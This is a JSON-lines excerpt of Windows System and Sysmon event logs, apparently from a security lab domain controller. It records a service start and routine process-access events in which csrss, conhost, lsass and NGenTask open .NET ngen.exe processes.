{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76861,"ProcessID":856,"ThreadID":944,"Channel":"System","Message":"The Windows Insider Service service entered the running state.","param1":"Windows Insider Service","param2":"running","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.882\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nSourceProcessId: 4688\r\nSourceThreadId: 4668\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00106D340B00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.882","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","SourceProcessId":"4688","SourceThreadId":"4668","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00106D340B00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.882\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00106D340B00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.882","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00106D340B00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.882\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010162F0B00}\r\nSourceProcessId: 2996\r\nSourceThreadId: 3764\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00106D340B00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.882","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010162F0B00}","SourceProcessId":"2996","SourceThreadId":"3764","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00106D340B00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.898\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00106D340B00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.898","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00106D340B00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.898\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-00106D340B00}\r\nTargetProcessId: 4316\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.898","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-00106D340B00}","TargetProcessId":"4316","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6176,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.914\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010CD2D0B00}\r\nSourceProcessId: 4688\r\nSourceThreadId: 4668\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nTargetProcessId: 4408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.914","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010CD2D0B00}","SourceProcessId":"4688","SourceThreadId":"4668","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","TargetProcessId":"4408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44545147)","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6177,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.914\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nTargetProcessId: 4408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.914","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","TargetProcessId":"4408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6178,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:30.914\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010162F0B00}\r\nSourceProcessId: 2996\r\nSourceThreadId: 3764\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nTargetProcessId: 4408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:30.914","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010162F0B00}","SourceProcessId":"2996","SourceThreadId":"3764","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","TargetProcessId":"4408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6179,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.742\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010A12C0B00}\r\nSourceProcessId: 3344\r\nSourceThreadId: 4820\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010714C0B00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000182404B)|UNKNOWN(0000000001823CFC)|UNKNOWN(0000000001821D03)|UNKNOWN(0000000001820B66)|UNKNOWN(000000000182054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:56:31.742","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010A12C0B00}","SourceProcessId":"3344","SourceThreadId":"4820","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{A837DB8D-040F-5F25-0000-0010714C0B00}","TargetProcessId":"4412","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.DLL+37d14(wow64)|UNKNOWN(000000000182404B)|UNKNOWN(0000000001823CFC)|UNKNOWN(0000000001821D03)|UNKNOWN(0000000001820B66)|UNKNOWN(000000000182054F)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+ebf6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+11e50(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+179f4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+117fd6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll+18f637(wow64)","EventReceivedTime":"2020-08-01 05:56:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:56:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:56:31.742\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-040F-5F25-0000-0010714C0B00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 